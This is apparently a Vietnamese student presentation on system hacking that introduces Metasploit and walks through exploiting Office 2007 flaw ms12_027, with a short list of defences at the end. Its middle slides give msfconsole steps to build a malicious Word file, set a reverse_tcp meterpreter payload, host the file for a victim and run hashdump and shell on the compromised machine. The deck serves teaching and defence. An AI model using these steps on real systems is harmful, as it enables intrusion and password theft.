1. Đề tài: System Hacking
Sinh viên:
Trần Văn Vịnh
Nguyễn Minh Tiến
GVHDTT : Võ Đỗ Thắng
2. Nội dung
• 1. Giới thiệu về System Hacking, Metasploit và cách sử
dụng Metasploit Framework.
• 2. Khai thác lỗi Microsoft Office 2007, mã lỗi ms12_027.
• 3. Khai thác lỗi Adobe Reader 9 trên WinXP.
(Demo video)
• 4. Tấn công WinXP sử dụng lỗi Internet Explorer, mã lỗi
ms12_004.
(Demo code)
• 5. Các phương pháp bảo mật, phòng tránh System
Hacking.
3. I. Giới thiệu System Hacking,
metasploit framework
1. Giới thiệu system hacking
System hacking bao gồm những kỹ thuật lấy username, password dựa
vào phần mềm cài trên hệ thống hoặc tính dễ cài đặt và chạy các dịch vụ từ xa của
hệ điều hành. Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông tin, xóa
những log file hệ thống.
2. Giới thiệu về MSF(metasploit framework)
MSF là một framework mã nguồn mở, được phát triển với mục đích
cung cấp các thông tin về các lỗ hổng bảo mật, hỗ trợ để thử nghiệm các xâm
nhập hệ thống (penetration testing: pen-testing ). Ban đầu MSF được viết bằng
ngôn ngữ Perl, nhưng từ phiên bản 3.0 trở đi MSF được viết lại toàn bộ bằng
Ruby, và được bổ sung thêm các công cụ khác trong nghiên cứu bảo mật như các
công cụ thu thập thông tin, fuzzing, scanner ..
4. II. Sử dụng Metasploit Framework
1) Chọn module exploit
Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có hỗ trợ để khai thác
- show exploits: xem các module exploit mà framework có hỗ trợ
- use exploit_name: chọn module exploit
- info exploit_name: xem thông tin về module exploit
2) Cấu hình module exploit đã chọn
- show options: Xác định những options nào cần cấu hình
- set : cấu hình cho những option của module đó
Một vài module còn có những advanced options, chúng ta có thể xem bằng
cách gõ dòng lệnh show advanceds
3) Verify những options vừa cấu hình
- check: kiểm tra xem những option đã được set chính xác chưa.
5. 4) Lựa chọn payload
Payload là đoạn code mà sẽ chạy trên hệ thống remote machine, là một
phần của virus máy tính để thực thi mã độc.
- show payloads: liệt kê ra những payload của module exploit hiện tại
- info payload_name: xem thông tin chi tiết về payload đó
- set payload payload_name: xác định payload module name.Sau khi
lựa chọn payload nào, dùng lệnh show options để xem những options
của payload đó
- show advanced: xem những advanced options của payload đó
5) Thực thi exploit
- exploit: lệnh dùng để thực thi payload code. Payload sau đó sẽ cung
cấp cho chúng ta những thông tin về hệ thống được khai thác
II. Sử dụng Metasploit Framework
6. III. Khai thác lỗi Microsoft
Office 2007, ms12_027
- Vào Terminal, gõ msfconsole và Enter:
7. Để dùng mã lỗi ms12-027: search ms12-027 và enter
III. Khai thác lỗi Microsoft
Office 2007, ms12_027
8. Ta gõ tiếp:
use exploit/windows/fileformat/ms12_027_mscomctl_bof và enter
III. Khai thác lỗi Microsoft
Office 2007, ms12_027
9. - set PAYLOAD windows/meterpreter/reverse_tcp
III. Khai thác lỗi Microsoft
Office 2007, ms12_027
10. Dùng lệnh: show options để xem các tham số cần thiết để có thể tiến
hành tấn công được:
III. Khai thác lỗi Microsoft
Office 2007, ms12_027
11. III. Khai thác lỗi Microsoft
Office 2007, ms12_027
Set filename : tên file word chứa mã đôc.
Set lhost: IP của máy tấn công.
Exploit : thực thi.
12. Copy file word chứa mã độc vào /var/www để máy victeam có thể
download về.
III. Khai thác lỗi Microsoft
Office 2007, ms12_027
14. - use exploit/multi/handler
- Set lại lhost và payload.
- exploit để bắt đầu khởi động server.
III. Khai thác lỗi Microsoft
Office 2007, ms12_027
15. - Tại máy victeam ta truy cập vào địa chỉ của máy tấn công để
downlad file word chứa mã độc về.
- Sau đó mở file word đó lên.
III. Khai thác lỗi Microsoft
Office 2007, ms12_027
16. Đợi một lát, trên máy tính tấn công ta được:
III. Khai thác lỗi Microsoft
Office 2007, ms12_027
17. - Để tương tác với 1 session nào đó ta thực hiện: sessions –i 1 (1 là id của
sessions)
- Bây giờ thì mọi việc đã trở nên dễ dàng hơn, khi kẻ tấn công đã điều
khiển được máy nạn nhân với toàn quyền. Ví dụ:
- Lệnh sysinfo để lấy thông tin của máy nạn nhân:
- Lệnh hashdump để lấy mật khẩu của người dùng dưới dạng hash
- Chúng ta có thể xem tất cả các lệnh hỗ trợ bằng lênh: help
III. Khai thác lỗi Microsoft
Office 2007, ms12_027
18. Lệnh rất hữu ích để sử dụng cmd (command-line): shell
III. Khai thác lỗi Microsoft
Office 2007, ms12_027
19. IV. Khai thác lỗi Adobe Reader
Video demo:
https://www.youtube.com/watch?v=xRgq7cZgCwo&feature=youtu.be
20. V. Khai thác lỗi Internet Explorer,
ms12_004
Demo code
21. VI. Các phương pháp bảo mật,
phòng tránh System Hacking.
• Cài đặt phần mềm diệt virut Internet Security.
• Thường xuyên cập nhật các bản vá lỗi của Microsofts,
Windows để tránh bị hacker lợi dụng.
• Luôn sử dụng các bản Office có bản quyền để luôn được
cập nhật vá lỗi và hỗ trợ kỹ thuật từ nhà cung cấp.
• Không nên mở các file Word, PDF, Link liên kết lạ… từ
email không rõ nguồn gốc.